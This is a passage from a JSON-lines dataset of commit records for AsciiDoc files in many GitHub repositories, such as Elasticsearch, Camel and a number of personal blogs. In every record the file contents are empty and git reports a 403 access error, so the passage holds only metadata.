Adding index file for GS \"mini book\".\n","repos":"shreejay\/elasticsearch,masaruh\/elasticsearch,kalimatas\/elasticsearch,qwerty4030\/elasticsearch,uschindler\/elasticsearch,wangtuo\/elasticsearch,coding0011\/elasticsearch,strapdata\/elassandra,brandonkearby\/elasticsearch,gingerwizard\/elasticsearch,mohit\/elasticsearch,strapdata\/elassandra,umeshdangat\/elasticsearch,scottsom\/elasticsearch,HonzaKral\/elasticsearch,brandonkearby\/elasticsearch,mohit\/elasticsearch,markwalkom\/elasticsearch,s1monw\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,fred84\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,qwerty4030\/elasticsearch,jimczi\/elasticsearch,robin13\/elasticsearch,vroyer\/elassandra,masaruh\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,masaruh\/elasticsearch,fred84\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Stacey-Gammon\/elasticsearch,pozhidaevak\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,umeshdangat\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,masaruh\/elasticsearch,lks21c\/elasticsearch,lks21c\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,fred84\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,kalimatas\/elasticsearch,masaruh\/elasticsearch,lks21c\/elasticsearch,coding0011\/elasticsearch,umeshdangat\/elasticsearch,kalimatas\/elasticsearch,umeshdangat\/elasticsearch,sneivandt\/elasticsearch,scorpionvicky\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,sneivandt\/elasticsearch,wenpos\/elasticsearch,Stacey-Gammon\/elasticsearch,robin13\/elasticsearch,scottsom\/elasticsearch,coding0011\/elasticsearch,pozhidaevak\/elasticsearch,wenpos\/elasticsearch,pozhidaevak\/elasticsearch,mohit\/elasticsearch,strapdata\/elassandra,mjason3\/elasticsearch,sneivandt\/elasticsearch,lks21c\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,qwerty4030\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,fred84\/elasticsearch,brandonkearby\/elasticsearch,kalimatas\/elasticsearch,scorpionvicky\/elasticsearch,markwalkom\/elasticsearch,vroyer\/elasticassandra,vroyer\/elassandra,coding0011\/elasticsearch,mjason3\/elasticsearch,maddin2016\/elasticsearch,shreejay\/elasticsearch,brandonkearby\/elasticsearch,gingerwizard\/elasticsearch,maddin2016\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,sneivandt\/elasticsearch,mjason3\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,pozhidaevak\/elasticsearch,kalimatas\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,maddin2016\/elasticsearch,mohit\/elasticsearch,wenpos\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nknize\/elasticsearch,wangtuo\/elasticsearch,vroyer\/elasticassandra,GlenRSmith\/elasticsearch,s1monw\/elasticsearch,scottsom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,lks21c\/elasticsearch,maddin2016\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,qwerty4030\/elasticsearch,Stacey-Gammon\/elasticsearch,jimczi\/elasticsearch,rajanm\/elasticsearch,shreejay\/elasticsearch,brandonkearby\/elasticsearch,qwerty4030\/elasticsearch,s1monw\/elasticsearch,markwalkom\/elasticsearch,uschindler\/elasticsearch,maddin2016\/elasticsearch,mjason3\/elasticsearch,vroyer\/elassandra,Stacey-Gammon\/elasticsearch,jimczi\/elasticsearch,sneivandt\/elasticsearch,shreejay\/elasticsearch,markwalkom\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,scottsom\/elasticsearch,rajanm\/elasticsearch,wenpos\/elasticsearch,wenpos\/elasticsearch,s1monw\/elasticsearch,umeshdangat\/elasticsearch,uschindler\/elasticsearch,shreejay\/elasticsearch,pozhidaevak\/elasticsearch,vroyer\/elasticassandra,gfyoung\/elasticsearch,markwalkom\/elasticsearch,gingerwizard\/elasticsearch,markwalkom\/elasticsearch,mohit\/elasticsearch,fred84\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scorpionvicky\/elasticsearch,wangtuo\/elasticsearch,jimczi\/elasticsearch,wangtuo\/elasticsearch,rajanm\/elasticsearch,jimczi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,s1monw\/elasticsearch,scottsom\/elasticsearch,strapdata\/elassandra,mjason3\/elasticsearch,rajanm\/elasticsearch,Stacey-Gammon\/elasticsearch","old_file":"docs\/reference\/gs-index.asciidoc","new_file":"docs\/reference\/gs-index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1a73702e46aa427c3a426d51df2cb932e7403acc","subject":"doc\/Z-PLUGINS.adoc","message":"doc\/Z-PLUGINS.adoc\n","repos":"psprint\/zplugin,psprint\/zplugin,psprint\/zplugin","old_file":"doc\/Z-PLUGINS.adoc","new_file":"doc\/Z-PLUGINS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psprint\/zplugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5680334d680dd4434f56fdcdb3db8c5329dc6e98","subject":"y2b create post Apple Airport Time Capsule Unboxing \\u0026 Overview (3TB Time Capsule 2013)","message":"y2b create post Apple Airport Time Capsule Unboxing \\u0026 Overview (3TB Time Capsule 2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-07-02-Apple-Airport-Time-Capsule-Unboxing-u0026-Overview-3TB-Time-Capsule-2013.adoc","new_file":"_posts\/2013-07-02-Apple-Airport-Time-Capsule-Unboxing-u0026-Overview-3TB-Time-Capsule-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea6808e6cc89597e1b4935fd5685994f78880ef0","subject":"Wording IDE","message":"Wording IDE\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/Style.adoc","new_file":"Best practices\/Style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76279457159488cfc746bcb3b4ac0bc5a441d25b","subject":"FH-4208 Walkthrough of Mobile CI\/CD with MCP","message":"FH-4208 Walkthrough of Mobile CI\/CD with MCP\n","repos":"feedhenry\/mcp-standalone,feedhenry\/mcp-standalone,feedhenry\/mcp-standalone,feedhenry\/mcp-standalone","old_file":"docs\/walkthroughs\/mobile-ci-cd.adoc","new_file":"docs\/walkthroughs\/mobile-ci-cd.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feedhenry\/mcp-standalone.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6b227889e7a84581f2f146935668f3403b0c1619","subject":"Add gh pages index","message":"Add gh pages index\n\nSigned-off-by: Hiroshi Miura <ff6fb3ed059786151e736af13627c08d24e9f922@linux.com>\n","repos":"eb4j\/xml2eb","old_file":"src\/docs\/asciidoc\/index.adoc","new_file":"src\/docs\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eb4j\/xml2eb.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"0efe8c79363dbaf5b27183de9cf7aea9b877136d","subject":"Update 2018-09-10-Go.adoc","message":"Update 2018-09-10-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-10-Go.adoc","new_file":"_posts\/2018-09-10-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4f894b39145d8d4d9446e5112d494f92767e60d","subject":"Update 2015-02-11-test-blog.adoc","message":"Update 2015-02-11-test-blog.adoc","repos":"ben-liu\/hubpress.io,ben-liu\/hubpress.io","old_file":"_posts\/2015-02-11-test-blog.adoc","new_file":"_posts\/2015-02-11-test-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ben-liu\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f82c9eedd53b2533de01f7bf49224f4461f722f","subject":"Update 2016-02-04-Inception.adoc","message":"Update 2016-02-04-Inception.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-02-04-Inception.adoc","new_file":"_posts\/2016-02-04-Inception.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1992c0d5dafed7753063db51f56ed90cd3321baa","subject":"Update 2016-10-03-Prototype.adoc","message":"Update 2016-10-03-Prototype.adoc","repos":"3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io","old_file":"_posts\/2016-10-03-Prototype.adoc","new_file":"_posts\/2016-10-03-Prototype.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/3991\/3991.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f1cf376a042bcc8441c41a659e3406593f7278e","subject":"Update 2017-02-02-Not-Clear.adoc","message":"Update 2017-02-02-Not-Clear.adoc","repos":"tofusoul\/tofusoul.github.io,tofusoul\/tofusoul.github.io,tofusoul\/tofusoul.github.io,tofusoul\/tofusoul.github.io","old_file":"_posts\/2017-02-02-Not-Clear.adoc","new_file":"_posts\/2017-02-02-Not-Clear.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tofusoul\/tofusoul.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3836b442a42f3a3eeef866db5c4b964fe88b4c5d","subject":"y2b create post Thank you.","message":"y2b create post Thank you.","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-18-Thank-you.adoc","new_file":"_posts\/2018-02-18-Thank-you.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c218dbaba4f3699a550853b5963babb2274f2230","subject":"code of conduct","message":"code of conduct\n","repos":"spring-cloud-stream-app-starters\/core","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud-stream-app-starters\/core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"038a7345a60b6f791936100d9e93b6397d1a5d3f","subject":"Formatting fix","message":"Formatting fix\n","repos":"Remo\/MyDevelopmentEnvironment,Remo\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment","old_file":"src\/sections\/04-utilities.adoc","new_file":"src\/sections\/04-utilities.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mlocati\/MyDevelopmentEnvironment.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d4d21511e17d99aac4ba2316faa416bb37b29f1","subject":"Renamed '_posts\/static-page-test.adoc' to '_posts\/About-Me.adoc'","message":"Renamed '_posts\/static-page-test.adoc' to '_posts\/About-Me.adoc'","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/About-Me.adoc","new_file":"_posts\/About-Me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a714010f2bd2c1658d787b46eafbaeee30376c5","subject":"Update 2016-08-30-About-me.adoc","message":"Update 2016-08-30-About-me.adoc","repos":"rage5474\/rage5474.github.io,rage5474\/rage5474.github.io,rage5474\/rage5474.github.io,rage5474\/rage5474.github.io","old_file":"_posts\/2016-08-30-About-me.adoc","new_file":"_posts\/2016-08-30-About-me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rage5474\/rage5474.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f8fc1da354cbce52757024845f67acd8b4117e8","subject":"Update 2016-10-03-Universe.adoc","message":"Update 2016-10-03-Universe.adoc","repos":"3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io","old_file":"_posts\/2016-10-03-Universe.adoc","new_file":"_posts\/2016-10-03-Universe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/3991\/3991.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a10e1bd62d551e00c03a16bd72e2eabe1a7f15be","subject":"Update 2015-09-20-Python-re-module.adoc","message":"Update 2015-09-20-Python-re-module.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-20-Python-re-module.adoc","new_file":"_posts\/2015-09-20-Python-re-module.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0520cf3a1b9d0dd689d96cf81effef4db8a648ab","subject":"Update 2016-02-22-Ground-Zero-Pt-1.adoc","message":"Update 2016-02-22-Ground-Zero-Pt-1.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-02-22-Ground-Zero-Pt-1.adoc","new_file":"_posts\/2016-02-22-Ground-Zero-Pt-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3866b94e0f72d2668814a1065c4f8b74aaca4660","subject":"Update 2017-03-18-Spring-Boot-Test.adoc","message":"Update 2017-03-18-Spring-Boot-Test.adoc","repos":"ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io,ovo-6\/ovo-6.github.io","old_file":"_posts\/2017-03-18-Spring-Boot-Test.adoc","new_file":"_posts\/2017-03-18-Spring-Boot-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ovo-6\/ovo-6.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd1b5eec7ec4bf445c5e3663ce21956c936fe931","subject":"Delete the file at '_posts\/2019-01-31-It-is-but-a-Test.adoc'","message":"Delete the file at '_posts\/2019-01-31-It-is-but-a-Test.adoc'","repos":"deivisk\/deivisk.github.io,deivisk\/deivisk.github.io,deivisk\/deivisk.github.io,deivisk\/deivisk.github.io","old_file":"_posts\/2019-01-31-It-is-but-a-Test.adoc","new_file":"_posts\/2019-01-31-It-is-but-a-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deivisk\/deivisk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e8962483a420eef3c8edada6f8cab19a1485616","subject":"To Eclipse Java 2019-06","message":"To Eclipse Java 2019-06\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Automated Eclipse install.adoc","new_file":"Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07423f4af36c8d3682bb86b97538ae518eb97e30","subject":"Update 2019-09-29-DB-tips.adoc","message":"Update 2019-09-29-DB-tips.adoc","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2019-09-29-DB-tips.adoc","new_file":"_posts\/2019-09-29-DB-tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remi-hernandez\/remi-hernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd8151e13228eb0d5e520e7ff7d2346b94c2e307","subject":"Added Backlog Tracer docs","message":"Added Backlog Tracer docs\n","repos":"pmoerenhout\/camel,onders86\/camel,ullgren\/camel,apache\/camel,tdiesler\/camel,alvinkwekel\/camel,CodeSmell\/camel,kevinearls\/camel,ullgren\/camel,christophd\/camel,cunningt\/camel,tadayosi\/camel,onders86\/camel,gnodet\/camel,apache\/camel,adessaigne\/camel,tadayosi\/camel,mcollovati\/camel,pax95\/camel,apache\/camel,christophd\/camel,alvinkwekel\/camel,Fabryprog\/camel,gnodet\/camel,objectiser\/camel,adessaigne\/camel,nicolaferraro\/camel,CodeSmell\/camel,cunningt\/camel,pmoerenhout\/camel,nicolaferraro\/camel,tdiesler\/camel,nikhilvibhav\/camel,cunningt\/camel,pmoerenhout\/camel,pmoerenhout\/camel,CodeSmell\/camel,pax95\/camel,ullgren\/camel,christophd\/camel,tadayosi\/camel,objectiser\/camel,pax95\/camel,christophd\/camel,Fabryprog\/camel,mcollovati\/camel,DariusX\/camel,onders86\/camel,alvinkwekel\/camel,tdiesler\/camel,DariusX\/camel,tadayosi\/camel,tdiesler\/camel,adessaigne\/camel,DariusX\/camel,pax95\/camel,gnodet\/camel,cunningt\/camel,gnodet\/camel,alvinkwekel\/camel,zregvart\/camel,punkhorn\/camel-upstream,apache\/camel,adessaigne\/camel,punkhorn\/camel-upstream,tadayosi\/camel,nikhilvibhav\/camel,objectiser\/camel,onders86\/camel,kevinearls\/camel,ullgren\/camel,onders86\/camel,mcollovati\/camel,zregvart\/camel,pax95\/camel,davidkarlsen\/camel,DariusX\/camel,christophd\/camel,tdiesler\/camel,pmoerenhout\/camel,tdiesler\/camel,tadayosi\/camel,gnodet\/camel,nikhilvibhav\/camel,adessaigne\/camel,pmoerenhout\/camel,zregvart\/camel,zregvart\/camel,nikhilvibhav\/camel,Fabryprog\/camel,kevinearls\/camel,punkhorn\/camel-upstream,adessaigne\/camel,christophd\/camel,mcollovati\/camel,pax95\/camel,nicolaferraro\/camel,apache\/camel,apache\/camel,davidkarlsen\/camel,onders86\/camel,objectiser\/camel,CodeSmell\/camel,Fabryprog\/camel,kevinearls\/camel,nicolaferraro\/camel,cunningt\/camel,kevinearls\/camel,davidkarlsen\/camel,punkhorn\/camel-upstream,cunningt\/camel,kevinearls\/camel,davidkarlsen\/camel","old_file":"docs\/user-manual\/en\/backlog-tracer.adoc","new_file":"docs\/user-manual\/en\/backlog-tracer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9ec37dc2f9bda2415e00f7f90d3fe81a2f780653","subject":"Update 2016-04-17-Android.adoc","message":"Update 2016-04-17-Android.adoc","repos":"KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io","old_file":"_posts\/2016-04-17-Android.adoc","new_file":"_posts\/2016-04-17-Android.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KozytyPress\/kozytypress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a5bb9b8d380ce08e47169f2829adecd00646939","subject":"Update 2017-10-09-Azure-7.adoc","message":"Update 2017-10-09-Azure-7.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-09-Azure-7.adoc","new_file":"_posts\/2017-10-09-Azure-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9ae05ce72da0cacf4c8135a0bb2f26061c7f7f0","subject":"Update 2018-04-30-v411.adoc","message":"Update 2018-04-30-v411.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-30-v411.adoc","new_file":"_posts\/2018-04-30-v411.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97c8102fbd4117b41348fd68ffd51c67934fcbf0","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-repository-redis","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-repository-redis.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"627838cc44f0ca22f53d1dacd4a21bf17300781a","subject":"Add contributing page","message":"Add contributing page\n","repos":"dejon97\/initializr,nevenc-pivotal\/initializr,Arsene07\/forge,spring-io\/initializr,bclozel\/initializr,nevenc-pivotal\/initializr,mikegehard\/initializr,Dragon3392\/initializr,gwidgets\/gwt-project-generator,dejon97\/initializr,praseodym\/initializr,mikegehard\/initializr,trifonnt\/initializr,trifonnt\/initializr,dejon97\/initializr,snicoll\/initializr,spring-io\/initializr,gwidgets\/gwt-project-generator,Arsene07\/forge,jadekler\/initializr,trifonnt\/initializr,praseodym\/initializr,MarkyMarkMcDonald\/initializr,bclozel\/initializr,Dragon3392\/initializr,dsyer\/initializr,jadekler\/initializr,nevenc-pivotal\/initializr,trifonnt\/initializr,Arsene07\/forge,snicoll\/initializr,mikegehard\/initializr,bclozel\/initializr,nevenc-pivotal\/initializr,nevenc-pivotal\/initializr,Arsene07\/forge,mikegehard\/initializr,jadekler\/initializr,gwidgets\/gwt-project-generator,MarkyMarkMcDonald\/initializr,gwidgets\/gwt-project-generator,praseodym\/initializr,MarkyMarkMcDonald\/initializr,Arsene07\/forge,praseodym\/initializr,bclozel\/initializr,dsyer\/initializr,dsyer\/initializr,jadekler\/initializr,bclozel\/initializr,MarkyMarkMcDonald\/initializr,spring-io\/initializr,snicoll\/initializr,Dragon3392\/initializr,dejon97\/initializr,Dragon3392\/initializr,dsyer\/initializr","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MarkyMarkMcDonald\/initializr.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2f19214e2c7ec862a14b9f96a71f6134e1249f37","subject":"Java 17","message":"Java 17\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Various.adoc","new_file":"Best practices\/Various.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09f1106ffb18cb246cae7df6c06931be90ee8c55","subject":"Update 2016-10-12-Como-pre-visualizar-UR-L-no-Safari.adoc","message":"Update 2016-10-12-Como-pre-visualizar-UR-L-no-Safari.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-10-12-Como-pre-visualizar-UR-L-no-Safari.adoc","new_file":"_posts\/2016-10-12-Como-pre-visualizar-UR-L-no-Safari.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ffafa592f0d4cb9687bd2c56017d33693421c6d3","subject":"JPA start","message":"JPA start\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"JPA.adoc","new_file":"JPA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c293fa7a0b3b9dd1c9db4b9194ea5a0716e0280","subject":"Create migration-notes.adoc","message":"Create migration-notes.adoc","repos":"apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis","old_file":"migration-notes.adoc","new_file":"migration-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/isis.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4ee354b9a1eadc03766047b77dccfcb2069f3847","subject":"Delete the file at '3-3-2017-Matt-Does-Info-Sec.adoc'","message":"Delete the file at '3-3-2017-Matt-Does-Info-Sec.adoc'","repos":"mattdoesinfosec\/mattdoesinfosec.github.io,mattdoesinfosec\/mattdoesinfosec.github.io,mattdoesinfosec\/mattdoesinfosec.github.io,mattdoesinfosec\/mattdoesinfosec.github.io","old_file":"3-3-2017-Matt-Does-Info-Sec.adoc","new_file":"3-3-2017-Matt-Does-Info-Sec.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mattdoesinfosec\/mattdoesinfosec.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef941bc9a58f3e26eb5ad6a4fde1ee2366efad5d","subject":"2016-07-10-Galactica.adoc","message":"2016-07-10-Galactica.adoc\n","repos":"Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io","old_file":"_posts\/2016-07-10-Galactica.adoc","new_file":"_posts\/2016-07-10-Galactica.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mr-IP-Kurtz\/mr-ip-kurtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c8f10902b677ade888e61d0eb82917a6825e64b","subject":"Update terminology from front page","message":"Update terminology from front page","repos":"pidydx\/artifacts,destijl\/artifacts,pidydx\/artifacts,destijl\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pidydx\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"25e39d84bc0361ac105be696cdf15d652c8631a5","subject":"Update 2015-05-17-Leonardo-da-Gerti.adoc","message":"Update 2015-05-17-Leonardo-da-Gerti.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-17-Leonardo-da-Gerti.adoc","new_file":"_posts\/2015-05-17-Leonardo-da-Gerti.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ae8009f469565547d0a71d5cd8c0caf5cf5346b","subject":"Update 2015-12-14-Test-Post.adoc","message":"Update 2015-12-14-Test-Post.adoc","repos":"ReadyP1\/hubpress.io,ReadyP1\/hubpress.io,ReadyP1\/hubpress.io","old_file":"_posts\/2015-12-14-Test-Post.adoc","new_file":"_posts\/2015-12-14-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 